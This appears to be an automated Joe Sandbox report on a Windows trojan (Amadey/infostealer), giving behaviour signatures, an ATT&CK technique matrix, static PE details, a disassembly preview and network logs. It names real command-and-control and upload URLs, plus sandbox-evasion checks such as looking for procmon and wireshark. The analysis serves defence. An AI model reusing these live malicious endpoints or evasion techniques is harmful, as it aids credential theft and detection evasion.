Source: C:\Users\user\Desktop\2OJYjm4J1B.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00439980 rdtsc 0_2_00439980
Source: 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ^}Program Manager
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.8:49705 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2OJYjm4J1B.exe70%ReversingLabsWin32.Trojan.Amadey
2OJYjm4J1B.exe100%AviraTR/Crypt.TPM.Gen
2OJYjm4J1B.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.twentytk20ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.html2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtd2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#2OJYjm4J1B.exefalse
                		high
                http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a12OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1870769984.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://httpbin.org/ipbefore2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.html2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#2OJYjm4J1B.exefalse
                        		high
                        http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpfalse
                          		unknown
                          http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850:2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://curl.se/docs/alt-svc.html2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj8502OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.css2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://.jpg2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.121.15.192
                                    		home.twentytk20ht.topSpain
                                    		207046REDSERVICIOESfalse
                                    34.226.108.155
                                    		httpbin.orgUnited States
                                    		14618AMAZON-AESUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1579639
                                    Start date and time:2024-12-23 06:53:11 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 4s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:2OJYjm4J1B.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:49f7c4981eb383aed2c3f6588545b605.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: 2OJYjm4J1B.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    00:54:43API Interceptor50x Sleep call for process: 2OJYjm4J1B.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.121.15.192ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                                    5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                    bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • fivetk5sb.top/v1/upload.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                    • twentytk20ht.top/v1/upload.php
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                    • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                    • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                    • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                    • fivetk5ht.top/v1/upload.php
                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                    • fivetk5ht.top/v1/upload.php
                                    34.226.108.155ze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                    Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      Set-up.exeGet hashmaliciousUnknownBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        httpbin.orgze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 34.226.108.155
                                                        5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 98.85.100.80
                                                        bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 98.85.100.80
                                                        jDSFvyBr1P.exeGet hashmaliciousUnknownBrowse
                                                        • 98.85.100.80
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                        • 98.85.100.80
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 34.226.108.155
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 34.226.108.155
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 98.85.100.80
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 34.226.108.155
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 98.85.100.80
                                                        home.twentytk20ht.top5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 185.121.15.192
                                                        16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                        • 185.121.15.192
                                                        5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                        • 185.121.15.192
                                                        u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                        • 185.121.15.192
                                                        TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        REDSERVICIOESze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 185.121.15.192
                                                        AMAZON-AESUSze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 34.226.108.155
                                                        armv4l.elfGet hashmaliciousUnknownBrowse
                                                        • 54.88.200.107
                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 54.137.103.116
                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 54.136.31.230
                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 54.2.45.144
                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 3.243.200.233
                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 3.242.220.133
                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 34.201.15.152
                                                        spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 44.205.162.242
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 34.226.108.155

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.985212880072902
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • VXD Driver (31/22) 0.00%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:2OJYjm4J1B.exe
                                                        File size:4'456'448 bytes
                                                        MD5:49f7c4981eb383aed2c3f6588545b605
                                                        SHA1:fa4bf7467762247e1c5933fe25c39875b34703a1
                                                        SHA256:4d44e006134267879fc41b2e837319fbc5b97210ad2ed3902ecfd4fd98af93e7
                                                        SHA512:1583d58bd9d9c1b121a1560d47b6ec26ffbe49323132c9dbfdf7f39cedf4f7fdc3056bc4e5ce39f70c0fea0c5e240dc817c2f057ae3114f8a2e974eaaba9262b
                                                        SSDEEP:98304:YdO34SmsnGHYiIkwtTAm5YcB0dcskIb7KQ16uBUF:YU4HsDiIxVAvcBUcq7KgUF
                                                        TLSH:B22633225FF800D4D9D6CCB27A8E5326E3B07B0383D81DA966035A36C67978697BDF41
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..................................MD...@... ............................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x106b000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                        DLL Characteristics:DYNAMIC_BASE
                                                        Time Stamp:0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp 00007FA6CCDA48CAh
                                                        pmaxub mm0, qword ptr [ebx+00h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        jmp 00007FA6CCDA68C5h
                                                        add byte ptr [ecx], al
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], cl
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        push es
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        and dword ptr [eax], eax
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        or byte ptr [eax+00000000h], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        push es
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax*4], cl
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        push es
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x72b05f0x73.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x72a0000x2b0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc69ae00x10oshltrdl
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc69a900x18oshltrdl
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        0x10000x7290000x28340078c914d9a6df8331ffe73540eba4b291unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x72a0000x2b00x200e2bc4d8f19b04c07bda9991dbf3d9d29False0.8046875data6.067961488125973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata 0x72b0000x10000x200d6de82d14e357527731a70b0d9d5c0e8False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        0x72c0000x3850000x200ebe41fc7de3bfdfab4a836d63861562bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        oshltrdl0xab10000x1b90000x1b8e004d6963733beaaa4dbc36b8a1be738dd5False0.9944817435143182data7.955137749688428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        ifmqqwjz0xc6a0000x10000x6005228844af41ddb4df2ec620a994aa57aFalse0.5774739583333334data5.074555642628291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .taggant0xc6b0000x30000x2200cfb973bc75464ed0dc28ebc39b4842d9False0.06571691176470588DOS executable (COM)0.8564687271181977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_MANIFEST0xc69af00x256ASCII text, with CRLF line terminators0.5100334448160535

                                                        Imports

                                                        DLLImport
                                                        kernel32.dlllstrcpy

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 23, 2024 06:54:16.536902905 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:16.536942005 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:16.537029982 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:16.554361105 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:16.554380894 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.288934946 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.289629936 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.289653063 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.291124105 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.291212082 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.292655945 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.292743921 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.299592018 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.299602032 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.349843025 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.619123936 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.619265079 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:18.619326115 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.627989054 CET49704443192.168.2.834.226.108.155
                                                        Dec 23, 2024 06:54:18.628005981 CET4434970434.226.108.155192.168.2.8
                                                        Dec 23, 2024 06:54:20.012063026 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.131683111 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.132826090 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.133878946 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.253484964 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253504992 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253612041 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.253631115 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253644943 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253726959 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253739119 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.253746986 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253766060 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.253789902 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.253864050 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:20.254023075 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:20.254076004 CET4970580192.168.2.8185.121.15.192
